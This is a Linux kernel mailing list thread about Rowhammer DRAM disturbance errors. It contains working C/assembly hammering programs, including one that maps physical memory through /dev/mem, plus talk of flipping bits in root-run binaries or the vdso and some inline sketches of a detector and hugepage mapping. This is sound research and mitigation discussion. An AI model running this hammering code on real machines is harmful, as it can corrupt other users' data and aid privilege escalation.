* DRAM unreliable under specific access pattern
@ 2014-12-24 16:38 Pavel Machek
2014-12-24 16:46 ` Pavel Machek
` (2 more replies)
0 siblings, 3 replies; 29+ messages in thread
From: Pavel Machek @ 2014-12-24 16:38 UTC (permalink / raw)
To: kernel list
Hi!
It seems that it is easy to induce DRAM bit errors by doing repeated
reads from adjacent memory cells on common hardware. Details are at

https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf

Older memory modules seem to work better, and ECC should detect
this. The paper has an inner loop that should trigger this.

Workarounds seem to be at the hardware level, and tricky, too.

Does anyone have an implementation of a detector? Any ideas how to
work around it in software?
Pavel
--
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html
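
For reference, the inner loop from the paper boils down to roughly the
sketch below (it is essentially the same loop used in the test programs
attached further down the thread; the helper name is made up here). w1
and w2 are assumed to be addresses mapping to different rows of the
same DRAM bank, which the sketch itself does not arrange:

/* Sketch of the paper's disturbance loop.  w1/w2 must land in
 * different rows of the same bank for the hammering to have any
 * effect; picking such a pair is the hard part. */
static void hammer(volatile char *w1, volatile char *w2)
{
	unsigned int i;

	for (i = 0; i < 0x1000000; i++) {
		__asm__ __volatile__(
			"movl 0(%0), %%eax \n"
			"movl 0(%1), %%eax \n"
			"clflush 0(%0) \n"
			"clflush 0(%1) \n"
			"mfence"
			:: "r" (w1), "r" (w2) : "eax");
	}
}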
^ permalink raw reply [flat|nested] 29+ messages in thread* Re: DRAM unreliable under specific access patern 2014-12-24 16:38 DRAM unreliable under specific access patern Pavel Machek @ 2014-12-24 16:46 ` Pavel Machek 2014-12-24 17:13 ` Andy Lutomirski 2014-12-28 9:18 ` Willy Tarreau 2 siblings, 0 replies; 29+ messages in thread From: Pavel Machek @ 2014-12-24 16:46 UTC (permalink / raw) To: kernel list, yoongukim, donghyu1, omutlu Hi! (I added original researches to the list). I see you have FPGA-based detector, and probably PC based detector, too. Would it be possible to share sources of the PC based one? Thanks, Pavel On Wed 2014-12-24 17:38:23, Pavel Machek wrote: > Hi! > > It seems that it is easy to induce DRAM bit errors by doing repeated > reads from adjacent memory cells on common hw. Details are at > > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf > > . Older memory modules seem to work better, and ECC should detect > this. Paper has inner loop that should trigger this. > > Workarounds seem to be at hardware level, and tricky, too. > > Does anyone have implementation of detector? Any ideas how to work > around it in software? > > Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 16:38 DRAM unreliable under specific access patern Pavel Machek 2014-12-24 16:46 ` Pavel Machek @ 2014-12-24 17:13 ` Andy Lutomirski 2014-12-24 17:25 ` Pavel Machek 2014-12-28 9:18 ` Willy Tarreau 2 siblings, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2014-12-24 17:13 UTC (permalink / raw) To: Pavel Machek; +Cc: kernel list On Wed, Dec 24, 2014 at 8:38 AM, Pavel Machek <pavel@ucw.cz> wrote: > Hi! > > It seems that it is easy to induce DRAM bit errors by doing repeated > reads from adjacent memory cells on common hw. Details are at > > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf > > . Older memory modules seem to work better, and ECC should detect > this. Paper has inner loop that should trigger this. > > Workarounds seem to be at hardware level, and tricky, too. One mostly-effective solution would be to stop buying computers without ECC. Unfortunately, no one seems to sell non-server chips that can do ECC. > > Does anyone have implementation of detector? Any ideas how to work > around it in software? > Platform-dependent page coloring with very strict, and impossible to implement fully correctly, page allocation constraints? --Andy > Pavel > -- > (english) http://www.livejournal.com/~pavelmachek > (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html -- Andy Lutomirski AMA Capital Management, LLC ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 17:13 ` Andy Lutomirski @ 2014-12-24 17:25 ` Pavel Machek 2014-12-24 17:38 ` Andy Lutomirski 0 siblings, 1 reply; 29+ messages in thread From: Pavel Machek @ 2014-12-24 17:25 UTC (permalink / raw) To: Andy Lutomirski; +Cc: kernel list [-- Attachment #1: Type: text/plain, Size: 1590 bytes --] On Wed 2014-12-24 09:13:32, Andy Lutomirski wrote: > On Wed, Dec 24, 2014 at 8:38 AM, Pavel Machek <pavel@ucw.cz> wrote: > > Hi! > > > > It seems that it is easy to induce DRAM bit errors by doing repeated > > reads from adjacent memory cells on common hw. Details are at > > > > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf > > > > . Older memory modules seem to work better, and ECC should detect > > this. Paper has inner loop that should trigger this. > > > > Workarounds seem to be at hardware level, and tricky, too. > > One mostly-effective solution would be to stop buying computers > without ECC. Unfortunately, no one seems to sell non-server chips > that can do ECC. Or keep using old computers :-). > > Does anyone have implementation of detector? Any ideas how to work > > around it in software? > > > > Platform-dependent page coloring with very strict, and impossible to > implement fully correctly, page allocation constraints? This seems to be at cacheline level, not at page level, if I understand it correctly. So the problem would is: I have something mapped read-only, and I can still cause bitflips in it. Hmm. So it is pretty obviously a security problem, no need for java. Just do some bit flips in binary root is going to run, and it will crash for him. You can map binaries read-only, so you have enough access. As far as I understand it, attached program could reproduce it on affected machines? Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html [-- Attachment #2: disturb.c --] [-- Type: text/x-csrc, Size: 803 bytes --] /* -*- linux-c -*- * * Try to trigger DRAM disturbance errors, as described in * * https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf * * Copyright 2014 Pavel Machek <pavel@ucw.cz>, GPLv2+. */ #include <stdlib.h> #include <stdio.h> #include <string.h> void disturb(char *where) { unsigned int i; for (i=0; i<0x1000000; i++) { __asm__ __volatile__( "movl 0(%0), %%eax \n" \ "movl 64(%0), %%eax \n" \ "clflush 0(%0) \n" \ "clflush 64(%0) \n" \ "mfence" :: "r" (where) : "eax" ); } } int main(int argc, char *argv[]) { long size = 1*1024*1024; long i; unsigned char *mem; mem = malloc(size); memset(mem, 0xff, size); for (i=0; i<128; i+=4) disturb(mem+i); for (i=0; i<size; i++) if (mem[i] != 0xff) printf("At %lx, got %x\n", i, mem[i]); } ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 17:25 ` Pavel Machek @ 2014-12-24 17:38 ` Andy Lutomirski 2014-12-24 17:50 ` Pavel Machek 0 siblings, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2014-12-24 17:38 UTC (permalink / raw) To: Pavel Machek; +Cc: kernel list On Wed, Dec 24, 2014 at 9:25 AM, Pavel Machek <pavel@ucw.cz> wrote: > On Wed 2014-12-24 09:13:32, Andy Lutomirski wrote: >> On Wed, Dec 24, 2014 at 8:38 AM, Pavel Machek <pavel@ucw.cz> wrote: >> > Hi! >> > >> > It seems that it is easy to induce DRAM bit errors by doing repeated >> > reads from adjacent memory cells on common hw. Details are at >> > >> > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf >> > >> > . Older memory modules seem to work better, and ECC should detect >> > this. Paper has inner loop that should trigger this. >> > >> > Workarounds seem to be at hardware level, and tricky, too. >> >> One mostly-effective solution would be to stop buying computers >> without ECC. Unfortunately, no one seems to sell non-server chips >> that can do ECC. > > Or keep using old computers :-). > >> > Does anyone have implementation of detector? Any ideas how to work >> > around it in software? >> > >> >> Platform-dependent page coloring with very strict, and impossible to >> implement fully correctly, page allocation constraints? > > This seems to be at cacheline level, not at page level, if I > understand it correctly. > > So the problem would is: I have something mapped read-only, and I can > still cause bitflips in it. > > Hmm. So it is pretty obviously a security problem, no need for > java. Just do some bit flips in binary root is going to run, and it > will crash for him. You can map binaries read-only, so you have enough > access. Right. So we're mostly screwed. > > As far as I understand it, attached program could reproduce it on > affected machines? I thought that article suggested using addresses 8M (is that 8 megabytes?) apart for the two accesses. --Andy > Pavel > -- > (english) http://www.livejournal.com/~pavelmachek > (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html -- Andy Lutomirski AMA Capital Management, LLC ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 17:38 ` Andy Lutomirski @ 2014-12-24 17:50 ` Pavel Machek 2014-12-29 12:13 ` Jiri Kosina 0 siblings, 1 reply; 29+ messages in thread From: Pavel Machek @ 2014-12-24 17:50 UTC (permalink / raw) To: Andy Lutomirski; +Cc: kernel list On Wed 2014-12-24 09:38:22, Andy Lutomirski wrote: > On Wed, Dec 24, 2014 at 9:25 AM, Pavel Machek <pavel@ucw.cz> wrote: > > On Wed 2014-12-24 09:13:32, Andy Lutomirski wrote: > >> On Wed, Dec 24, 2014 at 8:38 AM, Pavel Machek <pavel@ucw.cz> wrote: > >> > Hi! > >> > > >> > It seems that it is easy to induce DRAM bit errors by doing repeated > >> > reads from adjacent memory cells on common hw. Details are at > >> > > >> > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf > >> > > >> > . Older memory modules seem to work better, and ECC should detect > >> > this. Paper has inner loop that should trigger this. > >> > > >> > Workarounds seem to be at hardware level, and tricky, too. > >> > >> One mostly-effective solution would be to stop buying computers > >> without ECC. Unfortunately, no one seems to sell non-server chips > >> that can do ECC. > > > > Or keep using old computers :-). > > > >> > Does anyone have implementation of detector? Any ideas how to work > >> > around it in software? > >> > > >> > >> Platform-dependent page coloring with very strict, and impossible to > >> implement fully correctly, page allocation constraints? > > > > This seems to be at cacheline level, not at page level, if I > > understand it correctly. > > > > So the problem would is: I have something mapped read-only, and I can > > still cause bitflips in it. > > > > Hmm. So it is pretty obviously a security problem, no need for > > java. Just do some bit flips in binary root is going to run, and it > > will crash for him. You can map binaries read-only, so you have enough > > access. > Right. So we're mostly screwed. Well... We could periodically scrub (every few miliseconds) pages mapped to userspace. We might be able to do some magic and disallow cache flushes to userspace programs. We might be able to use performance metrics to detect heavy readers. We might be able to reprogram DRAM controller to refresh more often. Or we may switch to AMD systems as they seem to be less suspectible :-). Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
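
The "performance metrics" idea above could start out as something like
the sketch below: count last-level-cache misses over one 64 ms refresh
window and flag implausibly high rates. The event choice and the
threshold are guesses rather than measured values, the helper name is
invented, and a real detector would have to watch other tasks (or whole
CPUs) rather than itself:

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <linux/perf_event.h>

static int perf_open(struct perf_event_attr *attr, pid_t pid, int cpu)
{
	return syscall(__NR_perf_event_open, attr, pid, cpu, -1, 0);
}

int main(void)
{
	struct perf_event_attr attr;
	uint64_t misses;
	int fd;

	memset(&attr, 0, sizeof(attr));
	attr.size = sizeof(attr);
	attr.type = PERF_TYPE_HARDWARE;
	attr.config = PERF_COUNT_HW_CACHE_MISSES;	/* LLC misses */
	attr.exclude_kernel = 1;

	fd = perf_open(&attr, 0, -1);	/* this process, any CPU */
	if (fd < 0)
		return 1;

	for (;;) {
		ioctl(fd, PERF_EVENT_IOC_RESET, 0);
		ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
		usleep(64000);		/* one 64 ms refresh interval */
		ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);
		if (read(fd, &misses, sizeof(misses)) != sizeof(misses))
			break;
		/* Threshold is a wild guess; deliberate hammering causes
		   misses on the order of millions per second. */
		if (misses > 100000)
			printf("suspicious: %llu LLC misses in 64 ms\n",
			       (unsigned long long)misses);
	}
	return 0;
}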
* Re: DRAM unreliable under specific access patern 2014-12-24 17:50 ` Pavel Machek @ 2014-12-29 12:13 ` Jiri Kosina 2014-12-29 17:09 ` Pavel Machek 0 siblings, 1 reply; 29+ messages in thread From: Jiri Kosina @ 2014-12-29 12:13 UTC (permalink / raw) To: Pavel Machek; +Cc: Andy Lutomirski, kernel list, yoongukim, donghyu1, omutlu On Wed, 24 Dec 2014, Pavel Machek wrote: > Well... We could periodically scrub (every few miliseconds) pages > mapped to userspace. I.e. implement ECC in software. Would be extremely slow though. > We might be able to do some magic and disallow cache flushes to > userspace programs. My understanding is that cflush is not strictly necessary, it only makes the issue more likely to trigger. If you modify the pattern so that it neraly fits into cacheline (but not really), you would be able to produce similar (if not the same) cache eviction pattern as if without explicit cflush. Right? -- Jiri Kosina SUSE Labs ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-29 12:13 ` Jiri Kosina @ 2014-12-29 17:09 ` Pavel Machek 0 siblings, 0 replies; 29+ messages in thread From: Pavel Machek @ 2014-12-29 17:09 UTC (permalink / raw) To: Jiri Kosina; +Cc: Andy Lutomirski, kernel list, yoongukim, donghyu1, omutlu On Mon 2014-12-29 13:13:17, Jiri Kosina wrote: > On Wed, 24 Dec 2014, Pavel Machek wrote: > > > Well... We could periodically scrub (every few miliseconds) pages > > mapped to userspace. > > I.e. implement ECC in software. Would be extremely slow though. No, not really. If you read the cells that are about to go bad, you'll update them. Agreed on extremely slow. > > We might be able to do some magic and disallow cache flushes to > > userspace programs. > > My understanding is that cflush is not strictly necessary, it only makes > the issue more likely to trigger. Umm. Not really, AFAICT. So, the memory can take "certain ammount" of "neighboring accesses". You need to do that ammount before next refresh. > If you modify the pattern so that it neraly fits into cacheline (but not > really), you would be able to produce similar (if not the same) cache > eviction pattern as if without explicit cflush. Right? No, I don't think so. Well.. you need to generate certain ammount of traffic on the address lines, and it corrupts "neighboring" cells. I wish I knew more about DRAM... If you'll read a cache line, you can't "break" it as reads refreshes it. You need to do few miliseconds worth of reads, AFAICT. If you'll just keep reading cachelines, the cachelines you read will not be "neighboring" enough to the "target" cells you want to break. Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 16:38 DRAM unreliable under specific access patern Pavel Machek 2014-12-24 16:46 ` Pavel Machek 2014-12-24 17:13 ` Andy Lutomirski @ 2014-12-28 9:18 ` Willy Tarreau 2 siblings, 0 replies; 29+ messages in thread From: Willy Tarreau @ 2014-12-28 9:18 UTC (permalink / raw) To: Pavel Machek; +Cc: kernel list Hi Pavel, On Wed, Dec 24, 2014 at 05:38:23PM +0100, Pavel Machek wrote: > Hi! > > It seems that it is easy to induce DRAM bit errors by doing repeated > reads from adjacent memory cells on common hw. Details are at > > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf Extremely interesting stuff. I've always wondered if such modules were *that* reliable given how picky they are about all timings. > . Older memory modules seem to work better, and ECC should detect > this. Paper has inner loop that should trigger this. > > Workarounds seem to be at hardware level, and tricky, too. > > Does anyone have implementation of detector? Any ideas how to work > around it in software? Maybe reserve some memory "canary" that is periodically scanned and observe changes there. That will not tell you for sure that something has not been done, but it will tell you for sure that bits were flipped. Also I'm wondering whether perf counters on certain CPUs could be used to detect the abnormal number of clflushes or even the memory access pattern (will not work in multi-socket environments if a user has one dedicated CPU though). Thanks for sharing the link! Willy ^ permalink raw reply [flat|nested] 29+ messages in thread
[parent not found: <CAL82V5NN8U4PyiSjLxgpTrgsgkbM7rRCbVF5P-HHyEqphLOy+g@mail.gmail.com>]
* Re: DRAM unreliable under specific access patern [not found] <CAL82V5NN8U4PyiSjLxgpTrgsgkbM7rRCbVF5P-HHyEqphLOy+g@mail.gmail.com> @ 2014-12-24 22:08 ` Pavel Machek 2015-01-05 19:23 ` One Thousand Gnomes 2014-12-24 22:27 ` Pavel Machek 2014-12-24 23:41 ` Pavel Machek 2 siblings, 1 reply; 29+ messages in thread From: Pavel Machek @ 2014-12-24 22:08 UTC (permalink / raw) To: Mark Seaborn, kernel list; +Cc: luto [-- Attachment #1: Type: text/plain, Size: 1474 bytes --] Hi! > Try this test program: https://github.com/mseaborn/rowhammer-test > > It has reproduced bit flips on various machines. > > Your program won't be an effective test because you're just hammering > addresses x and x+64, which will typically be in the same row of > DRAM. Yep, I found out I was wrong in the meantime. > For the test to be effective, you have to pick addresses that are in > different rows but in the same bank. A good way of doing that is just to > pick random pairs of addresses (as the test program above does). If the > machine has 16 banks of DRAM (as many of the machines I've tested on do), > there will be a 1/16 chance that the two addresses are in the same > bank. How long does it normally teake to reproduce something on the bad machine? > [Replying off-list just because I'm not subscribed to lkml and only saw > this thread via the web, but feel free to reply on the list. :-) ] Will do. (Actually, it is ok to reply to lkml even if you are not subscribed; lkml is open list.). In the meantime, I created test that actually uses physical memory, 8MB apart, as described in some footnote. It is attached. It should work, but it needs boot with specific config options and specific kernel parameters. [Unfortunately, I don't have new-enough machine handy]. Best regards, Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html [-- Attachment #2: disturb.c --] [-- Type: text/x-csrc, Size: 1847 bytes --] /* -*- linux-c -*- * * Try to trigger DRAM disturbance errors, as described in * * https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf * * Copyright 2014 Pavel Machek <pavel@ucw.cz>, GPLv2+. * * You need to run this on cca 2GB machine, or adjust size below. * CONFIG_STRICT_DEVMEM must not be set. * Boot with "nopat mem=2G" */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <errno.h> void disturb(char *w1, char *w2) { /* As far as I could tell... this loop should be run for cca 128msec, to run for one full refresh cycle. */ unsigned int i; for (i=0; i< 672000; i++) { __asm__ __volatile__( "movl 0(%0), %%eax \n" \ "movl 0(%1), %%eax \n" \ "clflush 0(%0) \n" \ "clflush 0(%1) \n" \ "mfence" :: "r" (w1), "r" (w2) : "eax" ); } } int main(int argc, char *argv[]) { /* Ok, so we have one memory for checking, but we do need direct access to /dev/mem to access physical memory. /* This needs at least 2GB RAM machine */ long size = 1*1024*1024*1024; long i; unsigned char *mem, *map; int fd; if (size & (size-1)) { printf("Need power of two size\n"); return 1; } mem = malloc(size); memset(mem, 0xff, size); fd = open("/dev/mem", O_RDONLY); // fd = open("/tmp/delme", O_RDONLY); errno = 0; /* We want to avoid low 1MB */ map = mmap(NULL, size, PROT_READ, MAP_SHARED, fd, 1*1024*1024); if (errno) { printf("Can not mmap ram: %m\n"); return 1; } /* DRAM operates by whole cachelines, so it should not matter which byte in cacheline we access. 
*/ #define MEG8 (8*1024*1024) for (i=0; i<(size-MEG8)/100; i+=4096-64) disturb(map+i, map+i+MEG8); for (i=0; i<size; i++) if (mem[i] != 0xff) printf("At %lx, got %x\n", i, mem[i]); } [-- Attachment #3: disturb.c --] [-- Type: text/x-csrc, Size: 1847 bytes --] /* -*- linux-c -*- * * Try to trigger DRAM disturbance errors, as described in * * https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf * * Copyright 2014 Pavel Machek <pavel@ucw.cz>, GPLv2+. * * You need to run this on cca 2GB machine, or adjust size below. * CONFIG_STRICT_DEVMEM must not be set. * Boot with "nopat mem=2G" */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <errno.h> void disturb(char *w1, char *w2) { /* As far as I could tell... this loop should be run for cca 128msec, to run for one full refresh cycle. */ unsigned int i; for (i=0; i< 672000; i++) { __asm__ __volatile__( "movl 0(%0), %%eax \n" \ "movl 0(%1), %%eax \n" \ "clflush 0(%0) \n" \ "clflush 0(%1) \n" \ "mfence" :: "r" (w1), "r" (w2) : "eax" ); } } int main(int argc, char *argv[]) { /* Ok, so we have one memory for checking, but we do need direct access to /dev/mem to access physical memory. /* This needs at least 2GB RAM machine */ long size = 1*1024*1024*1024; long i; unsigned char *mem, *map; int fd; if (size & (size-1)) { printf("Need power of two size\n"); return 1; } mem = malloc(size); memset(mem, 0xff, size); fd = open("/dev/mem", O_RDONLY); // fd = open("/tmp/delme", O_RDONLY); errno = 0; /* We want to avoid low 1MB */ map = mmap(NULL, size, PROT_READ, MAP_SHARED, fd, 1*1024*1024); if (errno) { printf("Can not mmap ram: %m\n"); return 1; } /* DRAM operates by whole cachelines, so it should not matter which byte in cacheline we access. */ #define MEG8 (8*1024*1024) for (i=0; i<(size-MEG8)/100; i+=4096-64) disturb(map+i, map+i+MEG8); for (i=0; i<size; i++) if (mem[i] != 0xff) printf("At %lx, got %x\n", i, mem[i]); } ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 22:08 ` Pavel Machek @ 2015-01-05 19:23 ` One Thousand Gnomes 2015-01-05 19:50 ` Andy Lutomirski 2015-01-06 23:20 ` Pavel Machek 0 siblings, 2 replies; 29+ messages in thread From: One Thousand Gnomes @ 2015-01-05 19:23 UTC (permalink / raw) To: Pavel Machek; +Cc: Mark Seaborn, kernel list, luto > In the meantime, I created test that actually uses physical memory, > 8MB apart, as described in some footnote. It is attached. It should > work, but it needs boot with specific config options and specific > kernel parameters. Why not just use hugepages. You know the alignment guarantees for 1GB pages and that means you don't even need to be root In fact - should we be disabling 1GB huge page support by default at this point, at least on non ECC boxes ? Alan ^ permalink raw reply [flat|nested] 29+ messages in thread
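
A minimal sketch of the hugepage idea: a 1 GB huge page is physically
1 GB-aligned, so the low 30 bits of the physical address are known from
the offset into the mapping alone, without root or /dev/mem. This
assumes 1 GB pages were reserved at boot (e.g. hugepagesz=1G
hugepages=1) and that the CPU advertises pdpe1gb:

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/mman.h>

#ifndef MAP_HUGETLB
#define MAP_HUGETLB	0x40000
#endif
#ifndef MAP_HUGE_SHIFT
#define MAP_HUGE_SHIFT	26
#endif
#ifndef MAP_HUGE_1GB
#define MAP_HUGE_1GB	(30 << MAP_HUGE_SHIFT)
#endif

int main(void)
{
	size_t size = 1UL << 30;
	char *p = mmap(NULL, size, PROT_READ | PROT_WRITE,
		       MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB | MAP_HUGE_1GB,
		       -1, 0);
	if (p == MAP_FAILED) {
		perror("mmap");		/* most likely no 1 GB pages reserved */
		return 1;
	}
	/* Within this mapping, p+off and p+off+8MB are guaranteed to be
	   exactly 8 MB apart physically -- what the hammer loop wants. */
	printf("1 GB huge page at %p\n", p);
	return 0;
}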
* Re: DRAM unreliable under specific access patern 2015-01-05 19:23 ` One Thousand Gnomes @ 2015-01-05 19:50 ` Andy Lutomirski 2015-01-06 1:47 ` Kirill A. Shutemov 2015-01-06 23:20 ` Pavel Machek 1 sibling, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2015-01-05 19:50 UTC (permalink / raw) To: One Thousand Gnomes; +Cc: Pavel Machek, Mark Seaborn, kernel list On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes <gnomes@lxorguk.ukuu.org.uk> wrote: >> In the meantime, I created test that actually uses physical memory, >> 8MB apart, as described in some footnote. It is attached. It should >> work, but it needs boot with specific config options and specific >> kernel parameters. > > Why not just use hugepages. You know the alignment guarantees for 1GB > pages and that means you don't even need to be root > > In fact - should we be disabling 1GB huge page support by default at this > point, at least on non ECC boxes ? Can you actually damage anyone else's data using a 1 GB hugepage? --Andy > > Alan -- Andy Lutomirski AMA Capital Management, LLC ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-05 19:50 ` Andy Lutomirski @ 2015-01-06 1:47 ` Kirill A. Shutemov 2015-01-06 1:57 ` Andy Lutomirski 0 siblings, 1 reply; 29+ messages in thread From: Kirill A. Shutemov @ 2015-01-06 1:47 UTC (permalink / raw) To: Andy Lutomirski Cc: One Thousand Gnomes, Pavel Machek, Mark Seaborn, kernel list On Mon, Jan 05, 2015 at 11:50:04AM -0800, Andy Lutomirski wrote: > On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes > <gnomes@lxorguk.ukuu.org.uk> wrote: > >> In the meantime, I created test that actually uses physical memory, > >> 8MB apart, as described in some footnote. It is attached. It should > >> work, but it needs boot with specific config options and specific > >> kernel parameters. > > > > Why not just use hugepages. You know the alignment guarantees for 1GB > > pages and that means you don't even need to be root > > > > In fact - should we be disabling 1GB huge page support by default at this > > point, at least on non ECC boxes ? > > Can you actually damage anyone else's data using a 1 GB hugepage? hugetlbfs is a filesystem: the answer is yes. Although I don't see the issue as a big attach vector. -- Kirill A. Shutemov ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-06 1:47 ` Kirill A. Shutemov @ 2015-01-06 1:57 ` Andy Lutomirski 2015-01-06 2:18 ` Kirill A. Shutemov 0 siblings, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2015-01-06 1:57 UTC (permalink / raw) To: Kirill A. Shutemov Cc: One Thousand Gnomes, Pavel Machek, Mark Seaborn, kernel list On Mon, Jan 5, 2015 at 5:47 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: > On Mon, Jan 05, 2015 at 11:50:04AM -0800, Andy Lutomirski wrote: >> On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes >> <gnomes@lxorguk.ukuu.org.uk> wrote: >> >> In the meantime, I created test that actually uses physical memory, >> >> 8MB apart, as described in some footnote. It is attached. It should >> >> work, but it needs boot with specific config options and specific >> >> kernel parameters. >> > >> > Why not just use hugepages. You know the alignment guarantees for 1GB >> > pages and that means you don't even need to be root >> > >> > In fact - should we be disabling 1GB huge page support by default at this >> > point, at least on non ECC boxes ? >> >> Can you actually damage anyone else's data using a 1 GB hugepage? > > hugetlbfs is a filesystem: the answer is yes. Although I don't see the > issue as a big attach vector. What I mean is: if I map a 1 GB hugepage and rowhammer it, is it likely that the corruption will be confined to the same 1 GB? --Andy > > -- > Kirill A. Shutemov -- Andy Lutomirski AMA Capital Management, LLC ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-06 1:57 ` Andy Lutomirski @ 2015-01-06 2:18 ` Kirill A. Shutemov 2015-01-06 2:26 ` Andy Lutomirski 0 siblings, 1 reply; 29+ messages in thread From: Kirill A. Shutemov @ 2015-01-06 2:18 UTC (permalink / raw) To: Andy Lutomirski Cc: One Thousand Gnomes, Pavel Machek, Mark Seaborn, kernel list On Mon, Jan 05, 2015 at 05:57:24PM -0800, Andy Lutomirski wrote: > On Mon, Jan 5, 2015 at 5:47 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: > > On Mon, Jan 05, 2015 at 11:50:04AM -0800, Andy Lutomirski wrote: > >> On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes > >> <gnomes@lxorguk.ukuu.org.uk> wrote: > >> >> In the meantime, I created test that actually uses physical memory, > >> >> 8MB apart, as described in some footnote. It is attached. It should > >> >> work, but it needs boot with specific config options and specific > >> >> kernel parameters. > >> > > >> > Why not just use hugepages. You know the alignment guarantees for 1GB > >> > pages and that means you don't even need to be root > >> > > >> > In fact - should we be disabling 1GB huge page support by default at this > >> > point, at least on non ECC boxes ? > >> > >> Can you actually damage anyone else's data using a 1 GB hugepage? > > > > hugetlbfs is a filesystem: the answer is yes. Although I don't see the > > issue as a big attach vector. > > What I mean is: if I map a 1 GB hugepage and rowhammer it, is it > likely that the corruption will be confined to the same 1 GB? I don't know for sure, but it looks likely to me according to claim in the paper (8MB). But it still can be sombody else's data: 644 file on hugetlbfs mmap()ed r/o by anyone. When I read the paper I thought that vdso would be interesting target for the attack, but having all these constrains in place, it's hard aim the attack anything widely used. -- Kirill A. Shutemov ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-06 2:18 ` Kirill A. Shutemov @ 2015-01-06 2:26 ` Andy Lutomirski 2015-01-08 13:03 ` One Thousand Gnomes 0 siblings, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2015-01-06 2:26 UTC (permalink / raw) To: Kirill A. Shutemov Cc: One Thousand Gnomes, Pavel Machek, Mark Seaborn, kernel list On Mon, Jan 5, 2015 at 6:18 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: > On Mon, Jan 05, 2015 at 05:57:24PM -0800, Andy Lutomirski wrote: >> On Mon, Jan 5, 2015 at 5:47 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: >> > On Mon, Jan 05, 2015 at 11:50:04AM -0800, Andy Lutomirski wrote: >> >> On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes >> >> <gnomes@lxorguk.ukuu.org.uk> wrote: >> >> >> In the meantime, I created test that actually uses physical memory, >> >> >> 8MB apart, as described in some footnote. It is attached. It should >> >> >> work, but it needs boot with specific config options and specific >> >> >> kernel parameters. >> >> > >> >> > Why not just use hugepages. You know the alignment guarantees for 1GB >> >> > pages and that means you don't even need to be root >> >> > >> >> > In fact - should we be disabling 1GB huge page support by default at this >> >> > point, at least on non ECC boxes ? >> >> >> >> Can you actually damage anyone else's data using a 1 GB hugepage? >> > >> > hugetlbfs is a filesystem: the answer is yes. Although I don't see the >> > issue as a big attach vector. >> >> What I mean is: if I map a 1 GB hugepage and rowhammer it, is it >> likely that the corruption will be confined to the same 1 GB? > > I don't know for sure, but it looks likely to me according to claim in the > paper (8MB). But it still can be sombody else's data: 644 file on > hugetlbfs mmap()ed r/o by anyone. > > When I read the paper I thought that vdso would be interesting target for > the attack, but having all these constrains in place, it's hard aim the > attack anything widely used. > The vdso and the vvar page are both at probably-well-known 